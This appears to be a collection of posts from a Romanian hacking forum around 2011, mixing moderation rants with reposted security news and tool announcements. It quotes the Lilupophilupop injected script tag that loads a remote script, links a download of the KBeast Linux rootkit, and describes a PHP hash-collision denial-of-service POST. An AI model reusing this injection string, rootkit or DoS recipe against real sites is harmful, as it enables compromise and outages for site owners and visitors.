Nytro

SticKyWoX - Sa privim si din alt unghi situatia. Ai creat 38 de topicuri dintre care: - 15 la Offtopic - 16 la Ajutor Adica 31. Si mai raman cateva, care sunt de asemenea inutile. Ceea ce vreau sa subliniez e faptul ca nu ai contribuit cu nimic la forum, cu alte cuvinte prefer sa iti dau tie ban decat unuia care face 2-3 greseli gramaticale dar care contribuie la forum. Intelegeti cum gandesc?

Bun. Banuiesc ca nu o sa se opuna nimeni. O sa fac putin ordine diseara, daca nu uit.

Aratati-mi posturi cu multe greseli gramaticale. Acum daca posteza cineva un "decat" in loc de "doar", sa ii dam avertisment? Daca uita o cratima sau nu lasa spatii dupa semnele de punctuatie sa ii dam ban? Daca nu termina propozitia cu punct, inseamna ca e analfabet si il ardem pe rug? Si daca e sa ma gandesc la "neox" care nu e roman, deci gramatica sa nu e tocmai perfecta, dar va pune in cur pe 90+% dintre voi la cunostinte tehnice, lui sa ii dau ban, sau celor care o ard aiurea pe aici ca sa se afle si ei in treaba, dar vai, scriu corect gramatical? Nu toleram posturile de cocalari ce contin "k" in loc de "ca", "sh" in loc de "?"... Dar RST nu este ESL Forums, Teach English, Learn ESL online ca sa ne facem griji pentru mici greseli gramaticale. Cat timp posturile sunt utile, nu se leaga nimeni de micile greseli gramaticale si nici nu are rost sa punem accent pe ele. De asemenea sa nu va prind cu posturi ca "Ai uitat sa pui virgula" sau sa corectati un cuvant scris gresit intr-un post anterior ca primiti voi avertisment, pentru ca aceste posturi sunt inutile si vor incepe dispute pe tema "tu esti mai analfabet decat mine". Daca chiar doriti sa ajutati persoana respectiva ii dati un PM, insa poate acea greseala nu e cu intentie si doar graba e de vina. Intre timp, ganditi-va ca nici voi nu folositi diacritice, adica tot incorect ortografic scrieti, asa ca nu mai fiti zmeii gramaticii. Nici eu nu scriu cu diacritice si mai fac greseli gramaticale, dar fac asta pentru ca ma grabsesc, pentru ca nu stau 10 ani sa formulez o fraza si scriu ce imi trece in clipa de fata prin cap, pentru ca nu sunt romancier si cunostintele mele de gramatica sunt doar acceptabile, nu perfecte. Iar in situatia mea sunteti cam toti. Pe scurt, vreau sa vad posturi cu greseli gramaticale (link-uri), iar ideea cu contorul sa le-o prezentati celor de la EnglishForums de exemplu, locuri unde se pune accent pe aceste lucruri, in caz ca nu v-ati dat seama, RST e pentru altceva.

http://rstcenter.com/forum/search.php?do=finduser&userid=16882&contenttype=vBForum_Post&showposts=1 Ban.

One million pages infected by Lilupophilupop SQL injection One million pages infected by Lilupophilupop SQL injection ISC (Internet Storm Center) reported that lilupophilupop.com SQL injection attacks. There were about 80 pages infected according to Google searches few weeks back and now it raise to over 1 million . sites being injected with string : "></title><script src="http://lilupophilupop.com/sl.php"></script> Infections are shows on .com, .de, & .uk as the most affected regions. ISC posted stats just to give you a rough idea of where the pages are: UK - 56,300 NL - 123,000 DE - 49,700 FR - 68,100 DK - 31,000 CN - 505 CA - 16,600 COM - 30,500 RU - 32,000 JP - 23,200 ORG - 2,690 If you want to find out if you have a problem just search for "<script src="http://lilupophilupop.com/" in google and use the site: parameter to hone in on your domain. [News Submitted by @om_bee] Sursa: One million pages infected by Lilupophilupop SQL injection | The Hacker News (THN)

[h=3]Configuring a Hyper-V VM For Kernel Debugging[/h]ntdebug 30 Dec 2011 11:08 AM Yesterday's blog prompted some questions about how to set up a debugger for a Windows OS running in a Hyper-V VM. I was surprised that I wasn't able to find good, publicly available, Microsoft issued documentation for this configuration. The first step is to configure the Windows OS in the VM to enable a kernel debugger on COM1. One would use these same steps if you were preparing the OS to be debugged using a null modem cable. Hyper-V will allow us to redirect the COM port so that we don't need such a cable. Start an administrative command prompt. Turn on debugging with this command: bcdedit /debug on Configure the debugger to use COM1 with this command: bcdedit /dbgsettings SERIAL DEBUGPORT:1 BAUDRATE:115200 Note that these are the default settings and already exist in most bcd stores. However setting them again won't damage anything, and guards against a situation where the dbgsettings have been previously modified. Reboot so that the boot loader can read the new settings and configure the OS for debugging. Next, configure Hyper-V to redirect the COM1 port to a named pipe. We will use this pipe in place of a traditional null modem cable. Open Hyper-V Manager and browse to the settings page of the VM you configured to debug. Under the Hardware list choose COM 1. Change the Attachment to 'Named pipe:' and provide a pipe name. Note that the Hyper-V Manager provides the complete path to your named pipe. Make a note of this path as you will need it in the next step. After the OS and the VM are configured for debugging, we need to connect a debugger. On the Hyper-V parent partition download and install the Debugging Tools for Windows from Download and Install Debugging Tools for Windows. After installing the debugging tools you will have a ‘Debugging Tools for Windows’ entry in your start menu. In windbg open the File menu and choose ‘Kernel Debug’. Enter a Baud Rate of 115200, to match the settings made in the VM. Enter the Port that you configured in the VM settings page. To connect to the pipe remotely, substitute the '.' in the path with the Hyper-V server name. [*] Ensure that the Pipe and Reconnect boxes are checked. [*] Set Resets to 0. [*] Click OK to start debugging. [*] Windbg should display the string ' Waiting to reconnect...' To test the debugger connection in windbg, from the ‘Debug’ menu choose ‘Break’. This should cause the server to break into the debugger and display a kd> prompt. Please note that breaking into the debugger will cause the OS running in the VM to halt until you tell the debugger to go, the OS will appear to be hung during this time. The command 'g' followed by Enter will tell the debugger to ‘go’ causing the VM to resume operation. Sursa: Configuring a Hyper-V VM For Kernel Debugging - Ntdebugging Blog - Site Home - MSDN Blogs From this folder right click ‘WinDbg’ and choose ‘Run as administrator’. Windbg needs administrative rights to connect to the pipe.

KBeast (Kernel Beast) Linux Rootkit 2012 Authored by IPSECS KBeast (Kernel Beast) 2012 is a Linux rootkit that hides the loadable kernel module, hides files and directories, hides processes, hides sockets and connections, performs keystroke logging, has anti-kill functionality and more. Download: http://packetstormsecurity.org/files/download/108286/ipsecs-kbeast-v1.tar.gz Sursa: KBeast (Kernel Beast) Linux Rootkit 2012 ? Packet Storm

Am scos datele personale, in rest imi e indiferent de cacatul de aici. Muie tuturor.

Pe scurt, trimite prin POST 65535 de variabile. Puneti voi la inceputul scriptului un set_time_limit(0) pentru ca implicit e 30 de secunde.

Hmm, eu cred ca Tinkode (TK) de aici se da drept Tinkode de acolo fiind un fan de-al sau.

Sunt prerelease-uri, am inteles ca o sa apara subtitrari in engleza.

Pe asta va gasirati sa il luati la intrebari? Pfff.

[h=1]28c3: Building a Distributed Satellite Ground Station Network - A Call To Arms[/h] Andreas -horn- Hornig, hadez: Building a Distributed Satellite Ground Station Network - A Call To Arms Hackers need satellites. Hackers need internet over satellites. Satellites require ground stations. Let's build them! As proposed by Nick Farr et al at CCCamp11, we - the hacker community - are in desperate need for our own communication infrastructure. So here we are, answering the call for the Hacker Space Program with our proposal of a distributed satellite communications ground station network. An affordable way to bring satellite communications to a hackerspace near you. We're proposing a multi-step approach to work towards this goal by setting up a distributed network of ground stations which will ensure a 24/7 communication window - first tracking, then communicating with satellites. The current state of a proof of concept implementation will be presented.

[h=1]28c3: Security Nightmares[/h] **This video might be broken, incomplete and out of sync. It will be deleted and replaced very soon by the official recording. DO NOT LINK TO IT**

[h=1]28c3:The engineering part of social engineering[/h] http://www.youtube.com/watch?v=705bO-HDh4I **This video might be broken, incomplete and out of sync. It will be deleted and replaced very soon by the official recording. DO NOT LINK TO IT**

[h=1]28c3: New Ways I'm Going to Hack Your Web App[/h] **This video might be broken, incomplete and out of sync. It will be deleted and replaced very soon by the official recording. DO NOT LINK TO IT**

Understand heap structure Author: Senator of Pirates (zhani khalil)

Da, ar trebui sa mai dau niste banuri pe aici, s-au strans o gramada puradei ratati...

Pound Reverse HTTP Proxy 2.6 Authored by roseg | Site apsis.ch Pound is a reverse HTTP proxy, load balancer, and SSL wrapper. It proxies client HTTPS requests to HTTP backend servers, distributes the requests among several servers while keeping sessions, supports HTTP/1.1 requests even if the backend server(s) are HTTP/1.0, and sanitizes requests. Changes: Support for SNI via multiple Cert directives. A pre-defined number of threads for better performance on small hardware. Translation of hexadecimal characters in the URL for pattern matching. Support for a "Disabled" directive in the configuration. More detailed error logging. Allows multiple AddHeader directives. Download: http://packetstormsecurity.org/files/download/108220/Pound-2.6.tgz Sursa: Pound Reverse HTTP Proxy 2.6 ? Packet Storm

What to Look for in PHP 5.4.0 PHP 5.4.0 will arrive soon. The PHP team is working to bring to some very nice presents to PHP developers. In the previous release of 5.3.0 they had added a few language changes. This version is no different. Some of the other changes include the ability to use DTrace for watching PHP apps in BSD variants (there is a loadable kernel module for Linux folks). This release features many speed and security improvements along with some phasing out of older language features (Y2K compliance is no longer optional). The mysql extensions for ext/mysql, mysqli, and pdo now use the MySql native driver (mysqlnd). This release also improves support for multibyte strings. Built-in Development Server In the past, newcomers to PHP needed to set up a server. There was no built in server like a few other languages/web frameworks already had. If developing on *nix, a server needed to be set up with the right modules and the the files to test needed to be copied over to the document root. Now, you can just run PHP with some options to get a server: $ php -S localhost:1337 It runs in the current directory, using index.php or index.html as the default file to serve. A different document root can be specified as either an absolute or relative path: $ php -S localhost:1337 -t /path/to/docroot The server will log requests directly to the console. Interestingly, this server will not serve your static files unless your script returns false. Existing frameworks will need to be modified to add in functionality that is commonly in rewrite rules. This is really all that is needed: // If we're using the built-in server, route resources if (php_sapi_name() == 'cli-server') { /* * If the request is for one of these image types, return false. * It will serve up the requested file. */ if (preg_match('/\.(?:png|jpg|jpeg|gif)$/', $_SERVER["REQUEST_URI"])) return false; } // Process the rest of your script One of the inconveniences of the server is lack of support for SSL. Granted, it is meant for development purposes only. However, some projects I’ve worked on required testing with SSL. Perhaps there will be demand for this once it’s out there. An Overview of Traits Traits are bits of code that other objects can use. Traits allow composing objects and they promote code reuse. The Self programming language, one of the precursors to the JavaScript language, introduced them. JavaScript, strangely, does not directly implement traits; instead it allows one to extend objects directly with other objects. In PHP (and other languages), traits cannot be instantiated, only used to compose other objects. Traits do not imply inheritance, they just add methods to classes. They can be used with inheritance and interfaces. Traits could be used as standard implementations of interfaces, then one could easily compose classes that comply with certain interfaces. Here is an example, demonstrating a simple use of traits: name().", run!\n"; } // Gets the name of the runner // Must be implemented by the class using the trait. abstract public function name(); } /** * Define a class that uses the runner trait */ class runningPerson { // Use the runner trait use runner; // Used to store the person's name protected $name; // Constructor, assigns a name to the person public function __construct($name) { $this->name = $name; } // Retrieves the name of the person, required by runner trait public function name() { return $this->name; } } $gump = new runningPerson("Forrest"); $gump->run(); When a class implements a method that is also defined in a trait it uses, the method in the trait takes precedence and overrides the class method. If two traits implement the same method, the conflict needs to be resolved using the insteadof keyword, or given a new signature (only visibility and name can be changed) using the as keyword. <?php /** * Define traits with conflicting function names */ trait A { public function do_something(){ echo "In A::do_something():\n"; for($i = 0; $i do_something(); $testB->do_something(); $testB->something_else(); More examples reside at the current PHP documentation for traits. If that documentation is lacking in substance, Wikipedia’s article on traits links to plenty of background info. Changes to Anonymous Functions In PHP 5.3.x, working with anonymous functions needed a work around when stored in an array. The function needed to be stored in a temporary variable before it could be called. For instance: $functions = array(); // assign an anonymous function to an array element $functions['anonymous'] = function () { echo "Hello, the parser needs to make up a name for me...\n"; }; // to call it you had to do this: $temp = $functions['anonymous']; $temp(); Now, anonymous functions stored in an array can be called directly without first storing them in a temporary variable: // assume $functions[] is still around. $functions['anonymous'](); Closures in Classes Closures defined inside of a class are automatically early bound to the $this variable. If a class method returns a closure, it retains access to the original class that defined it (along with all the public member properties and methods) no matter where it is passed. If assigned to a member property and called as a method, PHP issues a warning if it was called directly. If called as a local variable or by calling the Closure::__invoke() method (which it inherits), PHP issues no warning. value = $value; } public function getValue() { return $this->value; } public function getCallback() { return function() { return $this->getValue(); }; } } /** * Create a class that calls a closure. */ class ClosureCaller { private $callback; public function setCallback($callback) { $this->callback = $callback; } public function doSomething() { // Since this is a member variable, call Closure::__invoke(). echo $this->callback->__invoke() . "\n"; } } // Set up a class to generate closures that reference itself $test = new ClosureTest(); $test->setValue(42); $closure = $test->getCallback(); echo $closure() . "\n"; // Test calling a closure from another class $testCaller = new ClosureCaller(); $testCaller->setCallback($test->getCallback()); $testCaller->doSomething(); Closures allow changing what object scope $this is bound to by calling the bindTo() method and passing in the new object to use as $this. Currently, no consensus exists around letting closures bound to an object access the private and protected methods of that class. Additionally, PHP still needs to iron out the details around binding closures to static classes. One can find more details about closures, $this, and Closure::bindTo() at https://wiki.php.net/rfc/closures/object-extension Outlook There are a lot of established projects that may not immediately start taking advantage of these features, unless the community sees an obvious benefit to drastically changing their projects. When PHP 5.3.0 was released with namespace support and anonymous functions, new frameworks sprung up like Laravel (anonymous functions), FLOW3 (namespaces), Lithium (namespaces), and Symfony2 (namespaces). After PHP 5.4.0 is released, I’m sure new frameworks (or new versions, like Symfony2 vs. Symfony) will spring up around using traits to compose functionality and using the new $this functionality in closures defined in classes. The built in server definitely has some potential for making it easier for developers to debug their apps. It’s just a matter of time before frameworks start taking advantage of it. Reference PHP 5.4.0 Release Candidate 2 News Sursa: What to Look for in PHP 5.4.0

[h=1]Stuxnet weapon has at least 4 cousins: researchers[/h] By Jim Finkle Wed Dec 28, 2011 6:46pm EST (Reuters) - The Stuxnet virus that last year damaged Iran's nuclear program was likely one of at least five cyber weapons developed on a single platform whose roots trace back to 2007, according to new research from Russian computer security firm Kaspersky Lab. Security experts widely believe that the United States and Israel were behind Stuxnet, though the two nations have officially declined to comment on the matter. A Pentagon spokesman on Wednesday declined comment on Kaspersky's research, which did not address who was behind Stuxnet. Stuxnet has already been linked to another virus, the Duqu data-stealing trojan, but Kaspersky's research suggests the cyber weapons program that targeted Iran may be far more sophisticated than previously known. Kaspersky's director of global research & analysis, Costin Raiu, told Reuters on Wednesday that his team has gathered evidence that shows the same platform that was used to build Stuxnet and Duqu was also used to create at least three other pieces of malware. Raiu said the platform is comprised of a group of compatible software modules designed to fit together, each with different functions. Its developers can build new cyber weapons by simply adding and removing modules. "It's like a Lego set. You can assemble the components into anything: a robot or a house or a tank," he said. Kaspersky named the platform "Tilded" because many of the files in Duqu and Stuxnet have names beginning with the tilde symbol "~" and the letter "d." Researchers with Kaspersky have not found any new types of malware built on the Tilded platform, Raiu said, but they are fairly certain that they exist because shared components of Stuxnet and Duqu appear to be searching for their kin. When a machine becomes infected with Duqu or Stuxnet, the shared components on the platform search for two unique registry keys on the PC linked to Duqu and Stuxnet that are then used to load the main piece of malware onto the computer, he said. Kaspersky recently discovered new shared components that search for at least three other unique registry keys, which suggests that the developers of Stuxnet and Duqu also built at least three other pieces of malware using the same platform, he added. Those modules handle tasks including delivering the malware to a PC, installing it, communicating with its operators, stealing data and replicating itself. Makers of anti-virus software including Kaspersky, U.S. firm Symantec Corp and Japan's Trend Micro Inc have already incorporated technology into their products to protect computers from getting infected with Stuxnet and Duqu. Yet it would be relatively easy for the developers of those highly sophisticated viruses to create other weapons that can evade detection by those anti-virus programs by the modules in the Tilded platform, he said. Kaspersky believes that Tilded traces back to at least 2007 because specific code installed by Duqu was compiled from a device running a Windows operating system on August 31, 2007. (Reporting By Jim Finkle; Editing by Phil Berlowitz) Sursa: Stuxnet weapon has at least 4 cousins: researchers | Reuters

[h=2]Web Application Vulnerability Scanner Evaluation[/h] A vulnerable web application designed to help assessing the features, quality and accuracy of web application vulnerability scanners. This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners. Important Update: auto-installer must be used - load war in tomcat, access URL "/wavsep/wavsep-install/install.jsp", and follow instructions. [h=3]Previous benchmarks performed using the platform:[/h] 2011 Comparison of 60 commercial & open source scanners 2010 Comparison of 42 open source scanners Additional information can be found in the developer's blog: Security Tools Benchmarking PDF files with detailed feature comparison are now hosted in the following web site: sectooladdict-benchmarks - A collection of benchmarks from the security tools benchmarking blog - Google Project Hosting [h=3]Project WAVSEP currently includes the following test cases:[/h] Vulnerabilities: Reflected XSS: 66 test cases, implemented in 64 jsp pages (GET & POST) Error Based SQL Injection: 80 test cases, implemented in 76 jsp pages (GET & POST) Blind SQL Injection: 46 test cases, implemented in 44 jsp pages (GET & POST) Time Based SQL Injection: 10 test cases, implemented in 10 jsp pages (GET & POST) Passive Information Disclosure/Session Vulnerabilities (inspired/imported from ZAP-WAVE): 3 test cases of erroneous information leakage, and 2 cases of improper authentication / information disclosure - implemented in 5 jsp pages Experimental Tase Cases (inspired/imported from ZAP-WAVE): 9 additional RXSS test cases (anticsrf tokens, secret input vectors, tag signatures, etc), and 2 additional SQLi test cases (INSERT) - implemented in 11 jsp pages (GET & POST) False Positives: 7 different categories of false positive Reflected XSS vulnerabilities (GET & POST ) 10 different categories of false positive SQL Injection vulnerabilities (GET & POST) Additional Features: A simple web interface for accessing the vulnerable pages An auto-installer for the mysql database schema (/wavsep-install/install.jsp) Sample detection & exploitation payloads for each and every test case Database connection pool support, ensuring the consistency of scanning results [h=3]Usage[/h] Although some of the test cases are vulnerable to additional exposures, the purpose of each test case is to evaluate the detection accuracy of one type of exposure, and thus, “out of scope” exposures should be ignored when evaluating the accuracy of vulnerability scanners. [h=3]Installation[/h] (@) Use a JRE/JDK that was installed using an offline installation (the online installation caused unknown bugs for some users). (1) Download & install Apache Tomcat 6.x (2) Download & install MySQL Community Server 5.5.x (Remember to enable remote root access if not in the same station as wavsep, and to choose a root password that you remember). (3) Copy the wavsep.war file into the tomcat webapps directory (Usually "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps" - Windows 32/64 Installer) (4) Restart the application server (5) Initiate the install script at: http://localhost:8080/wavsep/wavsep-install/install.jsp (6) Provide the database host, port and root credentials to the installation script, in additional to customizable wavsep database user credentials. (7) Access the application at: http://localhost:8080/wavsep/ [h=3]Troubleshooting Installation Issues[/h] [TABLE=width: 100%] [TR=class: pscontent] [TD=class: psdescription] As of version v1.1.1, several installation related issues were fixed (encoding / other). Make sure the JRE/JDK was installed using an offline installer. Make sure the tomcat server was installed after the offline JRE/JDK installation. Make sure that the mysql server was installed with remote root connection enabled, and with a firewall rule exception (options in the mysql installer). If previous versions of wavsep v1.1.0+ were installed, it's best to delete the "db" folder which was created after the previous installation under the tomcat root directory - prior to installing the new version (the installation should work even without this deletion, as long as sql-related pages were not accessed in the current tomcat execution). If the previous derby database was not deleted prior to the installation for whatever reason, do not access any sql-related existing pages before accessing the schema installation page. On windows 7, it might be necessary to run the tomcat server as an administrator permissions (rare scenario) [/TD] [/TR] [/TABLE] Download: http://code.google.com/p/wavsep/downloads/list Sursa: wavsep - Web Application Vulnerability Scanner Evaluation Project - Google Project Hosting

Hash collisions in POST Denial-of-service exploit demo by Krzysztof Kotowicz (@kkotowicz) More info: Denial of Service through hash table multi-collisions advisory | sources The following POST content should DoS PHP 5.3.x for a minute or so Post of Doom Link: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html Info: http://thehackernews.com/2011/12/web-is-vulnerable-to-hashing-denial-of.html

ack - Source code Grep ack is a tool like grep, designed for programmers with large trees of heterogeneous source code. ack is written purely in Perl, and takes advantage of the power of Perl's regular expressions. [h=2]Latest version of ack: 1.96, September 18, 2011[/h] Read the Changelog [h=2]How to install ack[/h] It can be installed any number of ways: Install the CPAN module App::Ack. If you are a Perl user already, this is the way to go. Download the standalone version of ack that requires no modules beyond what's in core Perl, and putting it in your path. If you don't want to mess with setting up Perl's CPAN shell, this is easiest. curl http://betterthangrep.com/ack-standalone > ~/bin/ack && chmod 0755 !#:3 Install the Macport: /trunk/dports/perl/p5-app-ack/Portfile – MacPorts Install the Debian package: ack-grep To install ack-grep as "ack" instead of "ack-grep", use this command: sudo dpkg-divert --local --divert /usr/bin/ack --rename --add /usr/bin/ack-grep [*]Install the Ubuntu package: ack-grep [*]Install the Fedora package: ack [*]Install the Gentoo package: sys-apps/ack [*]Install the Arch package: community/ack [h=2]Top 10 reasons to use ack instead of grep.[/h] It's blazingly fast because it only searches the stuff you want searched. ack is pure Perl, so it runs on Windows just fine. It has no dependencies other than Perl 5. The standalone version uses no non-standard modules, so you can put it in your ~/bin without fear. Searches recursively through directories by default, while ignoring .svn, CVS and other VCS directories. Which would you rather type? $ grep pattern $(find . -type f | grep -v '\.svn') $ ack pattern [*]ack ignores most of the crap you don't want to search VCS directories blib, the Perl build directory backup files like foo~ and #foo# binary files, core dumps, etc [*]Ignoring .svn directories means that ack is faster than grep for searching through trees. [*]Lets you specify file types to search, as in --perl or --nohtml. Which would you rather type? $ grep pattern $(find . -name '*.pl' -or -name '*.pm' -or -name '*.pod' | grep -v .svn) $ ack --perl pattern Note that ack's --perl also checks the shebang lines of files without suffixes, which the find command will not. [*]File-filtering capabilities usable without searching with ack -f. This lets you create lists of files of a given type. $ ack -f --perl > all-perl-files [*]Nicer and more flexible color highlighting of search results. [*]Uses real Perl regular expressions, not a GNU subset. [*]Allows you to specify output using Perl's special variables. To find all #include files in C programs: ack --cc '#include\s+<(.*)>' --output '$1' -h [*] Many command-line switches are the same as in GNU grep, so you don't have to relearn two sets: -w does word-only searching -c shows counts per file of matches -l gives the filename instead of matching lines etc. [*]Command name is 25% fewer characters to type! Save days of free-time! Heck, it's 50% shorter compared to grep -r. Download: http://betterthangrep.com/ack-standalone More info: ack 1.96 -- better than grep, a source code search tool for programmers

Train-switching system can be vulnerable to DDoS attack Hackers who have shut down websites by overwhelming them with web traffic could use the same approach to shut down the computers that control train switching systems, a security expert said at a hacking conference in Berlin. Prof. Stefan Katzenbeisser, the man behind this shocking claim made the revelation during his speech at the Chaos Communication Congress hosted by the Berlin. Prof. Katzenbeisser explained that all hell will break lose in case the encryption keys are compromised in the system, used for switching trains from one line to another. "Trains could not crash, but service could be disrupted for quite some time," Katzenbeisser told Reuters on the sidelines of the convention. "Denial of service" campaigns are one of the simplest forms of cyber attack: hackers recruit large numbers of computers to overwhelm the targeted system with Internet traffic. Katzenbeisser said GSM-R, a mobile technology used for trains, is more secure than the usual GSM, used in phones, against which security experts showed a new attack at the convention. "Probably we will be safe on that side in coming years. The main problem I see is a process of changing keys. This will be a big issue in the future, how to manage these keys safely," Katzenbeisser said. Prof Katzenbeisser believes the system is relatively secure from hackers under normal circumstances. However, the computer science expert from Technische Universitat Darmstadt warns that encryption keys, used to protect the communications, could pose risks. It said the risk would occur if one of them fell into the wrong hands. This could allow hackers to mount a denial of service attack by overwhelming the signals system with traffic, forcing it to shut down. The technology, on which the professor issued the advisory, is already in use in a number of countries in Europe, Africa as well as Asia. A group of manufacturers decided to switch to a single digital standard and developed GSM-Railway, a more secure version of the 2G wireless standard used by mobile phones. [Source] Sursa: Train-switching system can be vulnerable to DDoS attack | The Hacker News (THN)